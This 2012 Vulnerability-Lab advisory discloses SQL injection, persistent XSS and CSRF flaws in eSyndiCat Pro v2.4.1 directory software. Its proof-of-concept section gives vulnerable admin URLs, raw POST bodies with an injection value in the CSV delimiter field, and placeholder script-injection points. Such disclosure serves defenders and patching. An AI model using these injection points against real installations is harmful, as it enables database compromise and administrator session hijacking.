Title:
======
eSyndiCat Pro v2.4.1 - Multiple Web Vulnerabilities


Date:
=====
2012-05-19


References:
===========
http://www.vulnerability-lab.com/get_content.php?id=575


VL-ID:
=====
575


Common Vulnerability Scoring System:
====================================
7.1


Introduction:
=============
eSyndiCat is a full featured php directory software that can be used as an addition to your existing site 
or as a stand-alone platform. Using eSyndiCat Directory Software your website can achieve top rank and take 
the leading positions in the most popular search engines! Powering 45,000+ Successful Directories Since 2005
It is no wonder why eSyndiCat is one of the most popular php directory scripts since 2005. eSyndiCat is more 
than just a directory software. It can be easily used as a business directory script, article directory software, 
bidding directory script, church directory software and more.

(Copy of the Vendor Homepage: http://www.esyndicat.com )


Abstract:
=========
The Vulnerability Laboratory Research Team discovered multiple Web Vulnerabilities in eSyndiCat Pro v2.4.1 Service & Management System.  


Report-Timeline:
================
2012-05-19:  Public or Non-Public Disclosure


Status:
========
Published


Exploitation-Technique:
=======================
Remote


Severity:
=========
High


Details:
========
1.1
Multiple SQL Injection vulnerabilities are detected in the eSyndiCat Pro v2.4.1 Service Application & Management System.
The vulnerability allows an attacker (remote) to inject/execute own sql commands on the affected application dbms. 
The vulnerabilities are located in multiple application files when processing to request (POST) via cvs importer the 
Delimiter or when processing to add rss feeds with manipulated Number of items. Successful exploitation of the vulnerability 
results in dbms, service & application compromise. 

Vulnerable Module(s):
        [+] CVS Import - Delimiter
        [+] RSS ADD - Number of items

Vulnerable Parameter(s):
        [+] num & delimiter num


1.2
Multiple persistent input validation vulnerabilities are detected in the eSyndiCat Pro v2.4.1 Service Application CMS. 
The bugs allow remote attackers to implement/inject malicious script code on the application side (persistent). 
The persistent vulnerabilities are located  in the input fields of the account username, new listing descriptionname & 
controller suggest name. The persistent script code (HTML/JS) get executed out of the listing or username profile webpage 
context. Successful exploitation of the vulnerability can lead to session hijacking (manager/admin) or stable (persistent) 
context manipulation. Exploitation requires low user inter action & low privileged user account. 

Vulnerable Module(s): 
      [+] Accounts > Username
      [+] New Listings > Description of the Listing
      [+] Controller > Suggest Listing & Inputs


1.3
A cross site request forgery vulnerability is detected in eSyndiCat Pro v2.4.1 Service Application & Management System.  
The bugs allow remote attackers with high required user inter action to edit user accounts. Successful exploitation can 
lead to account creation. To exploit the issue the attacker need to create a manipulated copy the edit user mask/form. 
Inside of the document the remote can implement his own values for the update because of no form or token protection. 
When admin get now forced to execute the script via link he is executing the new value on the update of the application 
if his session is not expired.

Vulnerable Module(s):
      [+] Add Administrator Accounts - Form


Proof of Concept:
=================
1.1
The sql injection vulnerabilities can be exploited by remote attackers with privileged user account & without user inter action.
For demonstration or reproduce ...

PoC:
http://127.0.0.1:8080/admin/controller.php?plugin=import_csv  >  Delimiter   [POST]


POSTDATA =-----------------------------
-----------------------------133572933723271
Content-Disposition: form-data; name="delimeter"

-1'
-----------------------------133572933723271
Content-Disposition: form-data; name="parse"

Parse
-----------------------------133572933723271--



-----------------------------130222961710112
Content-Disposition: form-data; name="csvfile"; filename="1.csv"
Content-Type: application/x-download

hackhack-test
-----------------------------130222961710112
Content-Disposition: form-data; name="delimeter"

-1' VL
-----------------------------130222961710112
Content-Disposition: form-data; name="parse"

Parse
-----------------------------130222961710112--


-----------------------------238692936112896
Content-Disposition: form-data; name="delimeter"

-1'
-----------------------------238692936112896
Content-Disposition: form-data; name="parse"

Parse
-----------------------------238692936112896--

&& 

POSTDATA=
57185fdd52
&title=research&url=http://test.com
&num=[SQL Injection]
&status=active&goto=
list&categories=&save=Add

http://127.0.0.1:8080/admin/controller.php?plugin=rss&do=add  > Number of items


--- SQL Exception Logs ---
WARNING: mysql_list_fields() [function.mysql-list-fields]: Unable to save MySQL query 
result [ 16 May 2012 23:41:11 ] in cms/plugins/import_csv/admin/index.php:69

WARNING: mysql_num_fields(): supplied argument is not a valid MySQL result resource 
[ 16 May 2012 23:41:11 ] in cms/plugins/import_csv/admin/index.php:70

... or

Database query error:
Error: Unknown column  id_block in  field list 

UPDATE `v23s_blocks` SET `id_block` =  0  WHERE `id` =  6





1.2
The persistent input validation vulnerabilities can be exploited by remote attackers with low required user inter action.
For demonstration or reproduce ...

Review: User Account - Listing (After persistent  script code inject)

<td class="x-grid3-col x-grid3-cell x-grid3-td-2 " style="width: 379px;" tabindex="0">
<div id="ext-gen94" class="x-grid3-cell-inner x-grid3-col-2" unselectable="on">
"><[PERSISTENT SCRIPT CODE]("</div'></td><

URL: http://127.0.0.1:8080/bambam/admin/controller.php?file=accounts - username & email

Reference(s):
http://127.0.0.1:8080/articles/admin/controller.php?file=accounts&id=2 (USERNAME+[PERSISTENT SCRIPT CODE])
http://127.0.0.1:8080/articles/new-listings.html (Description+[PERSISTENT SCRIPT CODE])
http://127.0.0.1:8080/articles/admin/controller.php?file=suggest-listing&id=0  (SUGGEST TITLE+[PERSISTENT SCRIPT CODE])


1.3
The cross site request forgery vulnerability can be exploited by remote attackers with high required user inter action.
For demonstration or reproduce ...

URL: http://127.0.0.1:8080/articles/admin/controller.php?file=admins&do=add 

> ID=1  <= Admin ;)
> ID=2
> ID=3
> ID=4
> ID=5

- NAME > PASS > ID := 1


Risk:
=====
1.1
The security risk of the sql injection vulnerabilities are estimated as high(-).

1.2
The security risk of the persistent input validation vulnerabilities are estimated as medium(+).

1.3
The security risk of the cross site request forgery vulnerability is estimated as low(+).


Credits:
========
Vulnerability Laboratory [Research Team]  -    Benjamin Kunz Mejri [Rem0ve] (bkm@vulnerability-lab.com)


Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation 
may not apply.

Domains:  www.vulnerability-lab.com   - www.vuln-lab.com
Section:  video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com
Contact:  admin@vulnerability-lab.com - support@vulnerability-lab.com - irc.vulnerability-lab.com

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of 
other media, are reserved by Vulnerability-Lab Research Team or its suppliers.

                Copyright © 2012 Vulnerability-Lab




-- 
VULNERABILITY RESEARCH LABORATORY TEAM
Website: www.vulnerability-lab.com
Mail: research@vulnerability-lab.com